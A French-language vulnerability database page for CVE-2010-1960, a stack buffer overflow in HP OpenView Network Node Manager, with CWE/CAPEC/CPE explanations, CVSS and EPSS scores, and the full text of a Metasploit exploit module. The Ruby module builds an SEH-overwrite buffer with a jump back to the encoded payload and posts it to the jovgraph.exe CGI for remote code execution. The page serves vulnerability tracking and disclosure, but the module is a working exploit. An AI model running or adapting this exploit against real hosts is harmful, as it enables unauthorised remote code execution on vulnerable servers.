CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Buffer overflow in the error handling functionality in ovwebsnmpsrv.exe in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53 allows remote attackers to execute arbitrary code via a long, invalid option to jovgraph.exe.
Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
10
AV:N/AC:L/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
88.54%
–
–
2023-03-12
–
–
–
90.29%
–
2023-03-19
–
–
–
89.55%
–
2023-07-02
–
–
–
88.21%
–
2023-08-13
–
–
–
85.03%
–
2023-09-24
–
–
–
83.29%
–
2024-04-28
–
–
–
84.83%
–
2024-06-02
–
–
–
84.83%
–
2024-09-15
–
–
–
84.16%
–
2024-10-27
–
–
–
84.86%
–
2024-12-22
–
–
–
87.98%
–
2025-03-02
–
–
–
86.02%
–
2025-01-19
–
–
–
87.98%
–
2025-03-09
–
–
–
86.02%
–
2025-03-18
–
–
–
–
73.4%
2025-03-18
–
–
–
–
73.4,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2011-03-22 23h00 +00:00 Auteur : Metasploit EDB Vérifié : Yes
##
# $Id: hp_nnm_ovwebsnmpsrv_uro.rb 12095 2011-03-23 15:43:25Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53
prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'
CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.
The vulnerable code is within the option parsing function within "ovwebsnmpsrv.exe" with a
timestamp prior to April 7th, 2010.
Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined
with a some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is
important to note that this vulnerability must be exploited by overwriting SEH. This is since
overflowing the buffer with controllable data always triggers an access violation when
attempting to write static text beyond the end of the stack.
Exploiting this issue is a bit tricky due to a restrictive character set. In order to accomplish
arbitrary code execution, a double-backward jump is used in combination with the Alpha2
encoder.
} ,
'Author' =>
[
'jduck' # Metasploit module
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 12095 $',
'References' =>
[
[ 'CVE', '2010-1960' ],
[ 'OSVDB', '65427' ],
[ 'BID', '40637' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-105/' ],
[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Privileged' => false,
'Payload' =>
{
'Space' => 10240, # 10240 byte buffer..
# In addition to regular HTTP type bad chars, this one also has
# an issue with " since the buffer is being passed on the command line.
'BadChars' => (0x00..0x1f).to_a.pack('C*') + "\x20\x21\x22\x24\x2c\x3b\x3c\x3e\x60",
'DisableNops' => true,
# Manually use FPU to get EIP into ECX
'PrependEncoder' => "\x89\xe2\xdb\xdb\xd9\x72\xf4\x59\x83\xe9\xf7",
'EncoderOptions' => { 'BufferRegister' => 'ecx' },
},
'Platform' => 'win',
'Targets' =>
[
[ 'HP OpenView Network Node Manager 7.53 w/NNM_01206',
{
'Ret' => 0x5a238ba7, # pop edx/pop ebp/ret - in ovsnmp.dll v1.30.10.9166
}
],
[ 'Debug Target',
{
'Ret' => 0xdeadbeef, # crasher
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'June 08 2010'))
register_options(
[
Opt::RPORT(80),
], self.class)
end
def exploit
print_status("Trying target #{target.name}...")
cgi = '/OvCgi/jovgraph.exe'
# A long command line option (starts with -) will cause a buffer overflow.
# Action just has to be set, doesn't matter what it is.
action = rand_text_alphanumeric(1)
# "timestamp" cannot be set.
start = 'Unrecognized option: '
# SEH
seh_offset = 0x2cb0 # 0x13ffb0 - 0x13d300
seh_frame = generate_seh_record(target.ret)
# Jump back to the payload, after p/p/r jumps to us.
# NOTE: Putting the jmp_back after the SEH handler seems to avoid problems with badchars..
# 8 for SEH.Next+SEH.Func, 5 for the jmp_back itself
distance = seh_offset - 1 + seh_frame.length # dry run
jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
distance = seh_offset - start.length - 1 - jmp_back.length
jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
# A short jump back to the long jump back :)
jmp_small = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + jmp_back.length.to_s).encode_string
jmp_small << rand_text(2)
buf = '-'
buf << payload.encoded
buf << "A" * (seh_offset - start.length - buf.length - jmp_back.length)
buf << jmp_back
buf << jmp_small
buf << [target.ret].pack('V')
# Send the request
res = send_request_cgi({
'uri' => cgi,
'method' => "POST",
'vars_post' =>
{
'act' => action,
'arg' => buf,
}
}, 3)
if res and res.code != 502
print_error("Eek! We weren't expecting a response, but we got one")
print_status(res.inspect) if datastore['NNM_DEBUG']
end
handler
end
end